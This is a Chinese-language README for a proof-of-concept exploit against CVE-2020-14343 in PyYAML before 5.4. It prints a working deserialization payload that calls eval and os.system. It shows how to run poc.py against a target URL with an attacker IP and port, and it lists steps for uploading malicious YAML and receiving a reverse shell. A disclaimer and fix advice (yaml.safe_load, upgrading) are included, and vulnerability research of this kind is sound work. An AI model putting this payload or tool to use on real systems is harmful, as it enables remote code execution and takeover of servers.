# CVE-2020-14343 PyYAML 反序列化漏洞 POC

## 漏洞概述

| 项目 | 信息 |
|------|------|
| CVE编号 | CVE-2020-14343 |
| 影响组件 | PyYAML < 5.4 |
| 漏洞类型 | 反序列化远程代码执行 (RCE) |
| 危害等级 | 高危 |

## 漏洞原理

PyYAML 在使用 `yaml.load()` 解析不可信数据时，未限制危险的 YAML 标签（如 `!!python/object`），攻击者可构造恶意 YAML 内容执行任意 Python 代码。

**Payload 核心：**
```yaml
!!python/object/new:tuple
  - !!python/object/new:map
    - !!python/name:eval
    - ["__import__('os').system('command')"]
```

## 使用方法

```bash
python poc.py <目标URL> <攻击者IP> <监听端口>
```

**示例：**
```bash
python poc.py http://vulnerable-site.com 192.168.1.100 4444
```

## 攻击流程

1. 脚本在本地启动 TCP 监听器
2. 上传恶意 YAML 文件到目标 `/upload` 接口
3. 触发 `/login` 接口加载并解析 YAML
4. 目标服务器执行 payload，反弹 shell 到攻击者

## 依赖安装

```bash
pip install requests
```

## 免责声明

⚠️ **本工具仅供安全研究和授权测试使用！**

- 请勿用于非法用途
- 使用前请确保已获得目标系统的授权
- 作者不对任何滥用行为负责

## 修复建议

1. 使用 `yaml.safe_load()` 替代 `yaml.load()`
2. 升级 PyYAML 至 5.4 或更高版本
3. 对用户输入进行严格校验

## 参考链接

- [CVE-2020-14343 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2020-14343)
- [PyYAML 官方文档](https://pyyaml.org/)
